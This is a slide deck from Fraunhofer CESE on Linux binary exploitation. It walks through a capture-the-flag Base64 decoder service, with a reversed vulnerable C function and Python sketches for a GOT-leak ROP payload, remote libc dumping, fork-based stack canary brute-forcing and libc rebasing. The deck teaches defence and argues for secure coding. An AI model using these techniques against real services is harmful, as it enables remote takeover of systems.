© 2016 Fraunhofer USA, Inc.
Center for Experimental Software Engineering
Linux Binary Analysis and Exploitation
Dharma Ganesan, Mikael Lindvall
Context of the slides
 Gave a presentation: NASA Coding Summit
 Held at NASA’s IV&V Center
 NASA systems & context are removed in these slides
 Too sensitive for public release
 Increases the risk of attacks on those systems
 Slides meant to be a teaser on this topic
 Many low-level details are left out
 Time restriction (the original talk was only 30 minutes)
Keywords (used in our exploit)
 Return-Oriented Programming
 Address Space Layout Randomization (ASLR)
 Non-Executable Stack (NX)
 Attacking a Global Offset Table (GOT)
 Stealing Remote Libc
 Stealing Stack Canary
Attack Scenarios and Our Scope
 Scenario 1: Open-source software
 E.g. Linux, Apache Web-server, etc.
 Scenario 2: Open-binary but closed source
 E.g. Most commercial products
 Scenario 3: Closed-binary and closed source
 E.g. Remote services
 Scope of this talk: Scenario 2 (remote exploit)
Questions
 Many modern operating systems (OS) have
built-in security features
 more on this later
 Is it possible to circumvent these security
features and take over a remote machine?
 Do we still need secure coding even though the OS has security features?
 Let’s investigate these questions for Linux
 They are highly relevant for other OSes too!
Modern OS security features
(samples)
 Address Space Layout Randomization
(ASLR)
 Non-Executable Stack (NX)
 Stack Canary
ASLR feature for security
 Historically, memory addresses of variables and functions did not change between runs
 This predictability made remote code execution easy for hackers
 Address space layout randomization (ASLR) randomizes many items:
 Addresses of variables differ between runs
 (e.g. buffer addresses are difficult for hackers to predict)
 Load addresses of shared libraries/DLLs differ between runs
 (e.g. addresses of library functions are difficult for hackers to predict)
Non-Executable stack (NX) for
security
 Historically, hackers sent exploits through the user input buffer
 They then modified the control flow by redirecting execution to that buffer
 A non-executable stack (NX) does not allow code execution on the stack
 If a hacker stores an exploit (e.g. a virus) on the stack, the OS will not run that code
Stack Canary for security
 Historically, when hackers overflow a buffer and
modify the control flow, the OS was not aware of
this hacking event
 A stack canary (a random key) can detect this issue
 The random key, generated at process startup by the runtime linker, is placed on the stack between the local buffers and the saved return address to maintain control flow integrity
 One cannot overwrite the return address stored on the stack without also overwriting, and therefore having to guess, the canary!
High-level procedure for
analysis of binary
 Assumption: Remote service binary is available to the hacker
 but the environment is not
 Step 1: Data gathering about the target binary
 Step 2: Analyze binary for vulnerable library functions, signatures
 Step 3: Reachability analysis of vulnerable library functions
 Step 4: Memory layout analysis of the binary and remote machine
 Step 5: Stealing the remote’s libc and the stack canary
 Step 6: Construct evil input that will take over the remote machine
Applying the procedure:
An example
 Context: This service is part of a capture-the-flag online
challenge (ringzero.com)
 About the remote service (a Base64 decoder service):
 The remote service listens for input on a particular port
 It outputs the Base64 decoding of the given input
 The binary of the remote service is available for download
 But not the runtime environment, such as the libc libraries or the OS
 The binary consists of 600 assembly instructions (x86-64)
Applying the procedure:
An example
 Challenge:
 Break into this remote service
 Perform remote code execution by exploiting
vulnerabilities in the binary
 Steal secrets (i.e. flag file) from the server by
reading the file system of the server
Step 1: Data gathering of the
remote service
 Tools: readelf and grep
 What is the OS, machine, and processor type of the remote service?
 dharma@ubuntu:~$ readelf -hn <binary>
 Data: 2's complement, little endian
 OS/ABI: UNIX - System V
 Machine: Advanced Micro Devices X86-64
 OS: Linux, ABI: 2.6.24
 Unfortunately, my OS version differs from that of the remote service
 But we will overcome this problem (discussed later)
 Is the stack executable?
 dharma@ubuntu:~/Downloads$ readelf -lW <binary> | grep GNU_STACK
 Output: GNU_STACK ... RW 0x10
 RW means the stack is readable and writable but not executable (NX is on)
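The same two questions can also be answered without readelf. The following is a minimal sketch, assuming a 64-bit little-endian ELF file already read into memory; the function name describe_elf64 and the returned dictionary keys are illustrative and not part of the original talk.

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header type that records stack permissions
PF_X = 0x1                 # "executable" bit in p_flags
EM_X86_64 = 62             # e_machine value for x86-64


def describe_elf64(data: bytes) -> dict:
    """Summarize a 64-bit little-endian ELF image held in memory (sketch)."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 2 or data[5] != 1:
        raise ValueError("this sketch only handles 64-bit little-endian ELF")

    # ELF64 file header: e_ident[16] followed by the fixed-width fields.
    fields = struct.unpack_from("<16sHHIQQQIHHHHHH", data, 0)
    e_machine, e_phoff = fields[2], fields[5]
    e_phentsize, e_phnum = fields[9], fields[10]

    stack_flags = None
    for i in range(e_phnum):
        # Each ELF64 program header starts with p_type and p_flags (4 bytes each).
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            stack_flags = p_flags

    return {
        "osabi": data[7],  # 0 corresponds to "UNIX - System V"
        "is_x86_64": e_machine == EM_X86_64,
        # None when the binary carries no GNU_STACK header at all.
        "stack_executable": None if stack_flags is None else bool(stack_flags & PF_X),
    }
```

Calling describe_elf64(open(path, "rb").read()) on the downloaded binary would be expected to report an x86-64 target and a non-executable stack, matching the readelf output above.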
Step 1: Data gathering of the
remote service
 Is there a stack canary that will kick me out if I overflow any buffers?
 Tools used: objdump, grep
Dump of assembler code for function doprocessing:
0x0000000000400eaa <+318>: mov -0x8(%rbp),%rax
0x0000000000400eae <+322>: xor %fs:0x28,%rax
0x0000000000400eb7 <+331>: je 0x400ebe <doprocessing+338>
0x0000000000400eb9 <+333>: callq 0x400930 <__stack_chk_fail@plt>
 The stack canary is generated at runtime and kept in thread-local storage at %fs:0x28 (addressed through the fs segment register)
 Unfortunately, there is a built-in stack integrity check
 __stack_chk_fail will be called if I corrupt the stack
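The four instructions above can be read as a single comparison. The following is a small model of that check, written only to illustrate the logic; the function name and return strings are made up for this sketch.

```python
MASK64 = 0xFFFFFFFFFFFFFFFF


def epilogue_check(saved_on_stack: int, reference_in_tls: int) -> str:
    """Model of the canary check at the end of doprocessing (sketch)."""
    # mov -0x8(%rbp),%rax ; xor %fs:0x28,%rax
    rax = (saved_on_stack ^ reference_in_tls) & MASK64
    # je is taken only when the XOR left zero in %rax, i.e. both copies match.
    return "ret" if rax == 0 else "__stack_chk_fail"
```

An overflow that replaces the saved copy with attacker bytes makes the XOR non-zero, so the function aborts instead of returning to the overwritten address.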
Step 2: Analyze the binary for
vulnerable library functions?
 Tools used: objdump and grep
 Which external functions are used?
 dharma@ubuntu:~$ objdump -R <binary>
 Output: List of library functions used by the binary
 The hunt for vulnerable functions pointed me to “fork”
 This function is not used properly (more on this later)
 No strcpy or gets usage (unlucky for the hacker)
Step 2: Analyze the binary for
vulnerable signatures?
 Is there a function in the given binary which takes two buffers as
inputs but without the length of each buffer as arguments?
 If yes, then the service may have memory safety issues
 It may be possible to overflow the buffer, modify control flow
 Searching for vulnerable signature often requires disassembly of
the binary in order to reconstruct signatures for each function
 Takes a lot of time and effort
 Found a vulnerable signature: base64_decode(char*, char*);
 Disassembling the function revealed no bounds checking on the buffer sizes
Step 3: Reachability analysis
 How do we reach the vulnerable function?
 Answering this question requires reconstructing the call graph from the binary
 For example, in the remote service the vulnerable function base64_decode is called without bounds checking
 Great news for the hacker: a stack-based buffer overflow
Step 3: Reachability analysis:
Manually reversed C function from
binary (sample)
#include <strings.h>  /* bzero */
#include <unistd.h>   /* read, write */

/* Defined elsewhere in the binary; return type assumed from its use as a length. */
int base64_decode(char *in, char *out);

void doprocessing(void)
{
    char base64Out[0x200];
    char userInput[0x400];

    bzero(base64Out, 0x200);
    bzero(userInput, 0x400);
    write(1, "Please enter your base 64 string: \n", 0x23);
    read(0, userInput, 0x400);
    write(1, "Your message is:\n", 0x11);
    /* base64_decode is not checking the decoded buffer size */
    write(1, base64Out, base64_decode(userInput, base64Out));
    write(1, "\nThank you for using ringzer0 base64 decoder!\n", 0x2e);
}
• base64_decode can overwrite the return address of doprocessing
• Remote code execution becomes possible if the Base64-decoded string exceeds the size of base64Out
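The size mismatch can be checked with a little arithmetic. The following is a sketch, assuming base64_decode behaves like a standard Base64 decoder (every 4 input characters produce 3 output bytes); the constant names are illustrative.

```python
import base64

USER_INPUT_SIZE = 0x400   # bytes accepted by read() in doprocessing
BASE64_OUT_SIZE = 0x200   # bytes reserved for the decoded output

# Largest raw payload whose encoding still fits in one read():
# every 3 raw bytes become 4 Base64 characters.
max_raw = USER_INPUT_SIZE // 4 * 3
encoded = base64.b64encode(b"A" * max_raw)
decoded = base64.b64decode(encoded)

# Number of decoded bytes written past the end of base64Out.
overflow = len(decoded) - BASE64_OUT_SIZE
print(hex(len(encoded)), hex(len(decoded)), hex(overflow))
```

A full 0x400-character input decodes to 0x300 bytes, so up to 0x100 bytes can land beyond the 0x200-byte output buffer, which is enough room to reach the canary, the saved frame pointer and the return address.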
Step 4: Memory layout analysis
 Finding the vulnerability is a small part of the puzzle
 Exploiting the vulnerability is the tricky part
 We need to understand the memory layout of the
remote service from its binary in order to do remote
code execution
 Is address space layout randomization (ASLR) turned on on the remote machine?
 To answer this question, we need to find a way to leak memory addresses from the remote machine to our machine
Step 4: Leaking memory addresses
of the remote service
 Every dynamically linked Linux binary has a table called the Global Offset Table (GOT)
 The GOT contains pointers to the runtime addresses of library functions
 Goal: Print the GOT entries of the remote service!
 We can modify the control flow of the doprocessing function thanks to the buffer overflow
 We overwrite the return address of doprocessing with the address of the write function
 and pass a GOT entry address in the appropriate register (rsi, the buffer argument of write)
 This step is performed using return-oriented programming (ROP)
 Running the remote service twice showed different addresses: ASLR is ON, so the remote server is not easy to hack
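One way such a leak payload could be laid out is sketched here. Everything numeric is a placeholder: the padding length, the gadget addresses (pop_rdi, pop_rsi), the GOT entry and the write@plt address are hypothetical parameters that would have to be read from the actual binary, and the sketch assumes simple "pop reg; ret" gadgets exist and that rdx still holds a usable length from an earlier write call.

```python
import base64
import struct


def p64(value: int) -> bytes:
    """Pack an address as 8 little-endian bytes (x86-64)."""
    return struct.pack("<Q", value)


def build_got_leak(pad_len: int, canary: bytes, pop_rdi: int, pop_rsi: int,
                   got_entry: int, write_plt: int) -> bytes:
    """Build a Base64-encoded input that makes the service print a GOT entry (sketch)."""
    raw = b"A" * pad_len                   # filler up to the canary slot (length is an assumption)
    raw += canary                          # keep the 8-byte canary intact
    raw += p64(0)                          # saved rbp, value not important here
    raw += p64(pop_rdi) + p64(1)           # rdi = 1, the fd the service writes to
    raw += p64(pop_rsi) + p64(got_entry)   # rsi = address whose contents we want printed
    raw += p64(write_plt)                  # "return" into write(); rdx is left untouched
    return base64.b64encode(raw)           # the service Base64-decodes our input first
```

The eight bytes that come back are the runtime address of one library function; sending the same payload to two separate runs and comparing the results is what reveals whether ASLR is on.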
Step 5: Stealing the remote’s Libc
 The code fragments (gadgets) in libc are Turing-complete, meaning we can construct any algorithm from them
 Since the remote service is vulnerable to memory errors, we are able to read arbitrary memory of the remote service!
 This vulnerability allowed us to write a program that secretly transfers the remote service’s libc binary to our machine
 This solved the problem that the remote server has different runtime versions of libc and GCC
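The transfer program is not shown in the talk. As a rough sketch of the idea, assuming a leak(addr, size) primitive already exists (for example, built from the write-based leak), a dump loop could look like this; dump_region and make_fake_leak are hypothetical names, and the fake leak only stands in for the remote service so the loop can be exercised locally.

```python
from typing import Callable


def dump_region(leak: Callable[[int, int], bytes], start: int, length: int,
                chunk: int = 0x100) -> bytes:
    """Copy `length` bytes starting at `start` by calling the leak primitive repeatedly."""
    out = bytearray()
    while len(out) < length:
        want = min(chunk, length - len(out))
        data = leak(start + len(out), want)[:want]
        if not data:
            raise RuntimeError("leak returned no data at 0x%x" % (start + len(out)))
        out += data  # a short read is fine; the next request resumes where it stopped
    return bytes(out)


def make_fake_leak(memory: bytes, base: int) -> Callable[[int, int], bytes]:
    """Local stand-in for the remote leak: serves bytes from an in-memory image."""
    def leak(addr: int, size: int) -> bytes:
        off = addr - base
        return memory[off:off + size]
    return leak
```

Against the real service, each call to leak would cost one connection, so the chunk size trades the number of connections against the amount of data one ROP payload can print.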
Step 5: Stealing the stack canary
 The stack canary prevents remote code execution!
 Goal: Steal the stack canary by guessing 1 byte at a time
 Approach: A stack canary is 8 bytes, so this requires at most 8 × 256 = 2048 guesses
 The binary has a fork-based vulnerability, a design flaw
 The parent remote service spawns child processes using the fork syscall
 But all child processes inherit the same stack canary from the parent
 A wrong guess only crashes one child, so each byte can be confirmed independently
 Thus, we wrote a program that correctly guesses the stack canary in at most 8 × 256 attempts
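The guessing loop can be sketched as follows. The oracle survives(prefix) is an assumption: against the real service it would overflow the buffer just far enough to overwrite the first len(prefix) canary bytes and report whether the child still answers normally. Here a local stand-in with a known secret plays that role.

```python
from typing import Callable, Tuple


def brute_force_canary(survives: Callable[[bytes], bool], size: int = 8) -> Tuple[bytes, int]:
    """Recover the canary one byte at a time; returns (canary, attempts used)."""
    known = b""
    attempts = 0
    for _ in range(size):
        for guess in range(256):
            attempts += 1
            candidate = known + bytes([guess])
            if survives(candidate):   # child did not hit __stack_chk_fail
                known = candidate
                break
        else:
            raise RuntimeError("no byte value survived; the oracle is unreliable")
    return known, attempts


def make_local_oracle(secret: bytes) -> Callable[[bytes], bool]:
    """Stand-in for the forked service: a prefix 'survives' if it matches the secret."""
    def survives(prefix: bytes) -> bool:
        return secret.startswith(prefix)
    return survives
```

Because each byte is confirmed before moving on, the cost grows as 8 × 256 rather than 256 to the power of 8; this only works because forked children keep the parent's canary.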
Step 6: Constructing the evil input
that spawns a remote shell
 In our case, we want to spawn a remote shell using the vulnerable remote service
 We use return-oriented programming (ROP), a hacking technique that chains existing code fragments (gadgets)
 We wrote a program that constructs a ROP chain from gadgets found in the stolen libc
 We get a backdoor into the remote system!
 Please talk to me for more details!
 only 30 min talk
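One ingredient of such a program is turning offsets inside the stolen libc into runtime addresses on the remote machine. The following is a minimal sketch of that step only, assuming one library address has been leaked from the GOT; the function names are illustrative and any offsets passed in are placeholders, not values from the real target.

```python
PAGE_MASK = 0xFFF  # shared libraries are mapped at page-aligned addresses


def libc_base_from_leak(leaked_addr: int, symbol_offset: int) -> int:
    """Derive the remote libc load address from one leaked function address."""
    base = leaked_addr - symbol_offset
    if base < 0 or base & PAGE_MASK:
        # A misaligned base usually means the offset came from a different libc build.
        raise ValueError("computed base 0x%x is not page-aligned" % base)
    return base


def rebase(base: int, offset: int) -> int:
    """Runtime address of a symbol or gadget found at `offset` in the stolen libc."""
    return base + offset
```

Since ASLR moves the whole library as one block, a single leaked address is enough to locate every gadget and function in the stolen libc for that run.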
Conclusion
 Memory errors are very dangerous even if a remote machine is running in a custom-built environment!
 Hackers can steal, reconstruct, and exploit our environment
 Secure OS features are necessary but not sufficient
 We were able to defeat ASLR, NX, and Stack Canaries
 Secure coding is mandatory; OS cannot always protect us
if our coding is not secure
 One main security requirement: input validation
 Extensive off-nominal testing/verification is required!
Future work
 Our binary analysis is semi-manual
 More automation/research is needed for
binary reverse engineering
 Reachability analysis is effort-intensive
 Generating evil input that spawns a remote shell is the most challenging part of exploit generation
 We have some ideas for how to do this!
Linux Binary Analysis and
Exploitation
Dharma Ganesan, Mikael Lindvall
Fraunhofer Center for Experimental Software Engineering
College Park, Maryland, USA
{dganesan, mlindvall}@fc-md.umd.edu